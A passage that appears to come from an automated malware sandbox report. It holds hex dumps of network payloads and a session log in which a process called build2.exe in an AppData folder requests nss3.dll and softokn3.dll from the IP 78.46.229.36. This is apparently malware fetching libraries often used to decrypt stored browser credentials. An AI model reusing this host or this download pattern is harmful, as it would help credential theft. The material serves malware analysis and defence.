                                                                                                                                                                                                                                      2024-03-28 16:52:01 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                                                      Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                                                      2024-03-28 16:52:01 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                                                      Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                                                                                                                                                                      2024-03-28 16:52:01 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                                                      Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                                                                                                                                                                      2024-03-28 16:52:01 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                                                      Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                                                      2024-03-28 16:52:01 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                                                      Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                      2024-03-28 16:52:01 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                      Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                      2024-03-28 16:52:01 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                      Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                      2024-03-28 16:52:01 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                      Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      30192.168.2.64977978.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:02 UTC202OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:02 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:02 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 2046288
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-03-28 16:52:02 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                      2024-03-28 16:52:03 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                                                      Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                                                      2024-03-28 16:52:03 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                                                                                                                                                                      Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                      2024-03-28 16:52:03 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                                                      Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                                                                                                                                                                      2024-03-28 16:52:03 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                                                      Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                                                      2024-03-28 16:52:03 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                                                      Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                                                      2024-03-28 16:52:03 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                                                      Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                                                      2024-03-28 16:52:03 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                                                      Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                                                      2024-03-28 16:52:03 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                                                      Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                                                      2024-03-28 16:52:03 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                                                      Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      31192.168.2.64978178.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:04 UTC206OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:05 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 257872
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
